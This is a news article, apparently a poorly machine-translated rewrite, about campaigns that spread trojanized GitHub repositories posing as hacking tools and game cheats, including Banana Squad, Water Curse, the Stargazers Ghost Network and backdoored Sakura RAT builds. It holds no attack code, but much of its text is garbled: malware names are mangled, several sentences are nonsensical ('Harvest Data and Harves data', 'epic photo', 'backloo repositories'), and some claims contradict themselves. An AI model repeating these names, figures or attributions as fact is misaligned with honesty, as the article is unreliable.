Cybersecurity researchers have published more than 67 Github repositories that threat actors claim to provide Python-based hacking tools, but have discovered a new campaign that instead offers Trojanized Payloads.
The activity, called Banana Squad by ReversingLabs, was downloaded more than 75,000 times in 2023 and is rated as a continuation of the Rogue Python campaign targeting Python Package Index (PYPI) repository with fake packages with information-type capabilities on Windows systems.
The findings were built on a previous report from SANS’s Internet Storm Center in November 2024, and detailed the “Steam-Account-Checker” tool hosted on Github. This incorporates stealth capabilities and allows you to download malicious code to the Exodus Cryptocurrency Wallet App and the Harvest Data and Harves data and in the Extus Croptocurrency Wallet App.
Further analysis of repositories and attacker-controlled infrastructure has discovered 67 Trojanized Github repositories impersonating benign repositories of the same name.
There is evidence to suggest that users searching for software such as account cleaning tools, Discord account cleaners, Fortnite external cheats, Tiktok username checkers, and game cheats such as PayPal Bulk account checkers are targets for the campaign. All identified repositories were subsequently deleted by GitHub.
“Backdoors and troilerization code in public source code repositories like GitHub are becoming more common and representing the growth of software supply chain attack vectors.”
“For developers who rely on these open source platforms, it’s essential to always reaffirm that the repository they use contains what they really expect.”
Github as a malware distribution service
Development is increasingly occurring as Github is becoming the focus of several campaigns as a malware delivery vector. Earlier this week, Trend Micro said it had discovered 76 malicious Github repositories run by threat actors called Water Curses to provide multi-stage malware.
These payloads are designed to suck up your credentials, browser data, and session tokens, providing threat actors with permanent remote access to compromised systems.
Next, we use a criminal service known as the Stargazers Ghost Network to check for Point Point light on another campaign targeting Minecraft users with Java-based malware. The Stargazers Ghost Network refers to a collection of GitHub accounts that propagate malware or malicious links through a phishing repository.
“The network consists of multiple accounts that distribute malicious links and malware and perform other actions that perform other actions, such as starring, forking, or registering with malicious repositories.
Cybersecurity companies also rated that such “github ‘ghost” accounts are merely part of the epic photo, while other “ghost” accounts operate on different platforms as an integral part of the larger distribution universe as a service.
Several aspects of the Stargazers Ghost Network were published by CheckMarx in April 2024, calling a pattern of threat actors that uses fake stars to push out frequent updates to artificially inflate the popularity of the repository, and confirm that it is rising above GitHub search results.
These repositories are cleverly disguised as legitimate projects related to tools such as popular games, cheats, cryptocurrency price trackers, and crash betting games, such as multiplier prediction.
These campaigns also weave in another attack wave targeting novice cybercriminals, aiming to be easily available malware and attack tools on Github with a backdoid repository, infecting information stolen items.
In one example highlighted by Sophos this month, the troilized Sakura Rat repository was found to incorporate malicious code that compromised people who used information stolen items and other remote access trojans (RATs) to compile malware on their systems.
The identified repository acts as a conduit for visual studio pre-build events, Python scripts, screensaver files, and four types of backdoors embedded in JavaScript, stealing data, communicating via telegram, fetching more payloads, including Ashnararat, Remkosrat and Ranmasteel.
Overall, the cybersecurity company said it had detected over 133 backloo repositories as part of its campaign, with 111 detecting Builidd backdoors and others hosting Python, Screensaver and JavaScript backdoors.
Sophos also noted that these activities are linked to distribution operations as a service that has been operating since August 2022, and using thousands of GitHub accounts to distribute malware embedded in Trojanized repositories, focusing on game cheats, exploits and attack tools.
The exact distribution method used in the campaign is unknown, but threat actors are also thought to rely on Discord servers and YouTube channels to spread links to Trojanized repositories.
“It remains unclear whether this campaign directly links to whether some or all of the previous campaigns have been reported, but the approach appears to be popular and effective and is likely to continue in some way,” Sophos said. “In the future, the focus may change and threat actors may target other groups other than unfamiliar cybercriminals and gamers who use cheats.”
Sophos’ director and field CISO Chet Wisniewski told Hacker News there was “impressive similarities” between the campaign and Water Curse. These cover the following characteristics:
- Repository for “very similar names”
- Extensive use of your GitHub account
- Similar focus on electronic applications
- Similar abuse of Visual Studio prebuilding elements, and
- Reference to the “ischhfd83” email address (“ischhfd83@rambler(.)ru”). This is used to make a commit to a github repository
“Whether these campaigns are closely related or are part of a threat cluster that works from the same codebase and playbook deserves further investigation,” Wisniewski added.
